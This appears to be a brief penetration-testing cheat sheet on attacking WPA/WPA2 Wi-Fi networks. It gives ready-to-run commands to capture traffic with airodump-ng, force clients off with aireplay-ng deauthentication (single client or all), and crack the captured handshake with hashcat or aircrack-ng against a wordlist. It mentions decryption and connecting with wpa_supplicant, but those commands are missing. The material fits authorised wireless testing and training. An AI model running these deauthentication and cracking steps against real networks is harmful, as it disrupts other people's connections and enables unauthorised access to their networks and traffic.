WPA/ WPA2
if 802.11w is in use you need to wait until a client connects and can't deauth them
Deauth Attack:
Attack will requires multiple windows
Window 1:
# start listening and recording traffic
airodump-ng --bssid 30:46:9A:FC:53:C8 -c 2 -w wpa wlan0monWindow 2:
# deauth specific client traffic:
aireplay-ng -0 0 --bssid 30:46:9A:FC:53:C8 -h B8:2A:A9:56:95:C8 wlan0mon
# deauth all traffic:
aireplay-ng -0 0 --bssid 30:46:9A:FC:53:C8 wlan0monCrack:
# Hashcat
hcxpcapngtool -o wpa.hc22000 wpa-01.cap
hashcat -m 22000 wpa.hc22000 /usr/share/wordlist.txt
# Aircrack-ng
aircrack-ng wpa.hc22000 -w /usr/share/wordlist.txt
We can confirm it's cracking using 'airdecap-ng' to decrypt the capture packets:
Connect by creating a wpa.conf file:
Use wpa_supplicant to connect to the wireless network:
Last updated